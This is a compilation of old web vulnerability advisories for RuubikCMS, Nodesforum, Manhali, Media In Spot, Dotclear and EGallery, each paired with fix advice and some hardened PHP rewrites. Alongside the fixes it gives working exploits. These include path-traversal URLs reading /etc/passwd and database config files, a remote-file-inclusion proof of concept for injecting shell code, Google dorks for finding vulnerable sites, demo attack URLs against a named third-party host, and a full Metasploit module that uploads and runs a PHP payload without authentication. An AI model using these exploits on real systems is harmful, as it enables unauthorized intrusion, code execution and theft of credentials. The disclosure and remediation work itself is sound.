Ruubikcms v 1.1.0 File Inclusion Flaw and Fix
Part 1: Ruubikcms v 1.1.0 File Inclusion Flaw and Fix
Technical analysis:
source of /extra/image.php:
if (!isset($_GET['f']) OR empty($_GET['f'])) die("Please specify image.");
$fpath = BASE_DIR.$_GET['f'];
if (!is_file($fpath)) die("File does not exist.");

// file size in bytes
// $fsize = filesize($fpath);

// get mime type
$mtype = '';

if (function_exists('mime_content_type')) {
    $mtype = mime_content_type($fpath);
} elseif (function_exists('finfo_file')) {
    $finfo = finfo_open(FILEINFO_MIME); // return mime type
    $mtype = finfo_file($finfo, $fpath);
    finfo_close($finfo);
}

if ($mtype == '') {
    $mtype = "image/jpeg";
}

header("Content-type: $mtype");
readfile($fpath); // <--- LFI: $fpath still contains the unfiltered $_GET['f']
Test method:
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../boot.ini
/[ruubikcms1.1.0]/extra/image.php?f=../../../../../../../../[localfile]
Fix: filter the input
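One way to do that filtering for the image.php code above, as an added example that is not RuubikCMS code: resolve the requested name with realpath(), require the result to stay inside the image directory, and serve only detected image types. IMAGE_ROOT and the MIME allowlist are assumptions.

```php
<?php
// Added example: hardened rewrite of the file-serving logic in /extra/image.php.
// IMAGE_ROOT and the MIME allowlist are assumptions, not RuubikCMS settings.

/**
 * Resolve a user-supplied relative name to a regular file under $root.
 * Returns the canonical path, or null if it is missing or escapes $root.
 */
function resolve_inside(string $root, string $userPath): ?string
{
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    $rootReal = realpath($root);
    $fileReal = realpath($root . DIRECTORY_SEPARATOR . $userPath);
    if ($rootReal === false || $fileReal === false || !is_file($fileReal)) {
        return null;
    }
    // Compare with root + separator so /srv/img-old never matches /srv/img.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0 ? $fileReal : null;
}

/** Return the detected MIME type if it is an allowed image type, else null. */
function allowed_image_type(string $path): ?string
{
    $allowed = ['image/jpeg', 'image/png', 'image/gif'];
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path); // type only, no charset
    return in_array($mime, $allowed, true) ? $mime : null;
}

function serve_image(string $root, $requested): void
{
    $path = is_string($requested) ? resolve_inside($root, $requested) : null;
    $mime = $path !== null ? allowed_image_type($path) : null;
    if ($mime === null) {
        http_response_code(404); // same answer for "missing" and "outside root"
        exit('Not found.');
    }
    header('Content-Type: ' . $mime);
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}

// Usage in image.php (IMAGE_ROOT is a hypothetical constant for the image directory):
// serve_image(IMAGE_ROOT, $_GET['f'] ?? null);
```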
Part 2: Nodesforum 1.059 Remote File Inclusion Flaw and Fix
# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability
# Google Dork: inurl: powered by Nodesforum
# Date: 6/23/
# Author: bd0rk ( bd0rk[at]hackermail.com )
# Software-Download: home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip
# Tested on: Ubuntu-Linux / WinVista
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in 3rd_party_limits.php line 6 - 8
--------------------------------------------------------------------------------------------------------------
$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))
{include($limits_cache_url);}
The variable $limits_cache_url is built from the other variable $_nodesforum_code_path,
so we can use that variable.
PoC: /nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]
Fixtip: Declare $_nodesforum_code_path, likewise!
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)
#### The 22 years old, german Hacker bd0rk #### <---white-hat
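The fix tip above, worked through for 3rd_party_limits.php as an added example (not Nodesforum's own code): the path comes from constants set by the application rather than a variable the request can supply, direct requests are refused, and the resolved file must sit in the cache directory. NODESFORUM_CODE_PATH and NODESFORUM_TABLE_MODIFIER are hypothetical names.

```php
<?php
// Added example, not Nodesforum's own code. NODESFORUM_CODE_PATH and
// NODESFORUM_TABLE_MODIFIER are hypothetical constants that the forum's entry
// script would define from its configuration before including this file.

// Refuse direct requests: the constants exist only when the forum included us,
// and a constant cannot be overwritten from the query string.
if (!defined('NODESFORUM_CODE_PATH') || !defined('NODESFORUM_TABLE_MODIFIER')) {
    http_response_code(403);
    exit;
}

/**
 * Build the cache file path and return it only if it is an existing local
 * file directly inside <code path>/cache/; otherwise return null.
 */
function limits_cache_path(string $codePath, string $tableModifier): ?string
{
    // The modifier becomes part of a file name: restrict it to a safe alphabet.
    if (!preg_match('/^[A-Za-z0-9_]*$/D', $tableModifier)) {
        return null;
    }
    // realpath() resolves local paths only, so a URL or stream wrapper yields false.
    $cacheDir = realpath($codePath . '/cache');
    $file = realpath($codePath . '/cache/' . $tableModifier . '_3rd_party_limits.php');
    if ($cacheDir === false || $file === false || !is_file($file)) {
        return null;
    }
    return dirname($file) === $cacheDir ? $file : null;
}

$limits_cache_url = limits_cache_path(NODESFORUM_CODE_PATH, NODESFORUM_TABLE_MODIFIER);
if ($limits_cache_url !== null
    && filemtime($limits_cache_url) > time() - 24 * 3600 * 14) {
    include $limits_cache_url;
}
```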
Part 3: Manhali v1.8 Local File Inclusion Flaw and Fix
Title: Manhali v1.8 Local File Inclusion Vulnerability
Author: L0n3ly-H34rT l0n3ly_h34rt@hotmail.com
Vendor: www.manhali.com/
Download: sourceforge.net/projects/manhali/files/manhali_1.8.zip/download
Affected version: 1.8 (older versions may also be affected; not checked)
Tested on: Linux/Windows
############################################
# P.O.C :
/manhali/includes/download.php?f=../includes/dbconfig.php
############################################
# Greetz to my friendz
Part 4: Media In Spot CMS Local File Inclusion Flaw and Fix
#Name : Media In Spot LFI Vulnerability
#Date : May,16
#Vendor Url : http://www.mediainspot.com/
#Dork: "Powred By Media In Spot"
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
Fix: filter the input
Part 5: media In Spot CMS Local File Inclusion Flaw and Fix (Vulnerability Alert)
#Name : Media In Spot LFI Vulnerability
#Date : May,16 2011
#Vendor Url : http://www.mediainspot.com/
#Dork: "Powred By Media In Spot"
#Author : wlhaan haker
#############################################################
Exploit:
server/path/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
###############################################################
Fix:
demo
www.badguest.cn/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
www.badguest.cn/ufp/view/lang/index.php?page=../../../../../../../../../../../../../../../../../../../../etc/passwd
Fix: filter the input
Part 6: Dotclear 2.4.2 Arbitrary File Upload Flaw and Fix
Title: dotclear-2.4.2 (Swf) File Upload Vulnerability
Author: T0x!c Malik_99@hotmail.fr
Download: fr.dotclear.org/download
Affected version: 2.4.2
Tested on: [Windows Xp]
Proof of concept:
/path/inc/swf/swfupload.swf
You can upload files in PHP format
For example: c99.php, shell.gif.php, etc.
Fix provided by www.2cto.co:
Strengthen validation
Part 7: EGallery PHP File Upload Flaw and Fix (Vulnerability Alert)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "EGallery PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in EGallery 1.2. By abusing the
        uploadify.php file, a malicious user can upload a file to the egallery/ directory
        without any authentication, which results in arbitrary code execution. The module
        has been tested successfully on Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Sammy FORGIT', # Discovery, PoC
          'juan' # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['EGallery 1.2', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jul 08 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
      ], self.class)
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}egallery/uploadify.php"
    })

    if res and res.code == 200 and res.body.empty?
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    boundary = Rex::Text.rand_text_hex(7)

    post_data = "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n\r\n"
    post_data << "#{payload_name}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"folder\"\r\n\r\n"
    post_data << "#{uri}\r\n"
    post_data << "--#{boundary}\r\n"
    post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n\r\n"
    post_data << "<?php "
    post_data << payload.encoded
    post_data << " ?>\r\n"
    post_data << "--#{boundary}--\r\n"

    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}egallery/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{boundary}",
      'data'   => post_data
    })

    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      print_error("#{peer} - File wasn't uploaded, aborting!")
      return
    end

    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}#{payload_name}"
    })

    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. Print the status code for debugging purposes.
    if res and res.code != 200
      print_status("#{peer} - Server returned #{res.code.to_s}")
    end
  end
end
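The "strengthen validation" fix from Part 6 and the missing checks in uploadify.php described in Part 7, as an added example that is not Dotclear or EGallery code: the handler requires a logged-in session, ignores the client's file name and folder, decides the type from the file content, and stores the file under a server-chosen name. The session key, size limit, allowlist and UPLOAD_DIR are assumptions.

```php
<?php
// Added example, not Dotclear or EGallery code. The session key, size limit and
// allowlist are assumptions; 'Filedata' is the field name used in the module above.

/**
 * Validate one $_FILES entry. Returns a server-chosen file name to store it
 * under, or null to reject. The client-supplied name is never consulted.
 */
function safe_upload_name(array $file): ?string
{
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] <= 0 || $file['size'] > 5 * 1024 * 1024) {
        return null;
    }
    // Decide by content: a name such as "shell.gif.php" has no say here.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset($allowed[$mime])) {
        return null;
    }
    if (@getimagesize($file['tmp_name']) === false) {   // must parse as an image
        return null;
    }
    // Random base name plus an extension from the allowlist: never ".php".
    return bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
}

/** Handle the upload and return the HTTP status code to send. */
function handle_upload(string $uploadDir): int
{
    if (empty($_SESSION['user_id'])) {      // no anonymous uploads
        return 403;
    }
    $file = $_FILES['Filedata'] ?? null;
    $name = is_array($file) ? safe_upload_name($file) : null;
    if ($name === null) {
        return 400;
    }
    // The destination is fixed server-side; a posted "folder" field is ignored.
    // move_uploaded_file() also refuses sources that are not real HTTP uploads.
    $ok = move_uploaded_file($file['tmp_name'], $uploadDir . '/' . $name);
    return $ok ? 201 : 500;
}

// Usage (UPLOAD_DIR is a hypothetical directory where PHP execution is disabled):
// session_start(); http_response_code(handle_upload(UPLOAD_DIR));
```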